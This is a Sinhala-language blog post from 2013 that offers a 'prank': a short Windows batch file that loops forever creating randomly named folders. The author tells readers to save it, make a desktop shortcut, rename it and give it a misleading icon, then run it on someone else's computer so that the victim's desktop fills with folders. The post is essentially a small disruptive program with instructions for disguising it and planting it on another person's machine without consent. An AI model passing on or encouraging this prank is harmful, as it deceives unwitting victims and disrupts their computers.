Like us

Follow Us

Total Pageviews

සුභ නව වසරක් වේවා!

එක ක්ලික් එකයි ෆෝල්ඩර් 1000යි

by Unknown  |  in ෆන් වැඩ at  Tuesday, April 09, 2013



අද ගෙනාවෙ පිස්සු හැදෙන වැඩක්..මේක හදලා කාටහරි කරල බලන්න.එක ක්ලික් එකයි ෆෝල්ඩර් 1000 යි.කොහොමද වැඩේ... ඊටපස්සෙ Delete කරන එක තමා තියෙන්නෙ..


@echo off
:top
md %random%
goto top


ඉස්සල්ලාම මේ කෝඩ් එක නෝට් පෑඩ් එකට පේස්ට් කරලා 1000.bat කියලා සේව් කරන්න.හුටා..අමතක උනා.කෝඩ් එක කොපි කරන්න බෑ නේද.මෙතනින් බාගන්න එහෙනම්


දැන් ඒකෙ shortcut එකක් හදාගෙන desktop එකට කොපි කරන්න.

 දැන් ඒක Rename  කරලා එක icon එක එහෙම වෙනස් කරන්න.
 

දැන් ඉතින් click කරල බලන්න..හෝව්!!හෝව්!! ඔයා නෙවේ..වෙන එක්කෙනෙකුගෙ කොම් එකකට කරල බලන්න. එයා මේක click කරපු ගමන් desktop එකේ දඩ බඩ ගාලා folders 1000ක් හැදෙනවා..පිස්සු හැදෙයි නේ,,,,


2 comments:

+++වැඩේ හොදයි කියලා හිතෙනවනම් ශේප් එකේ අදහසකුත් කොටලම යන්නකෝ..

Related Posts Plugin for WordPress, Blogger...
Proudly Powered by Blogger.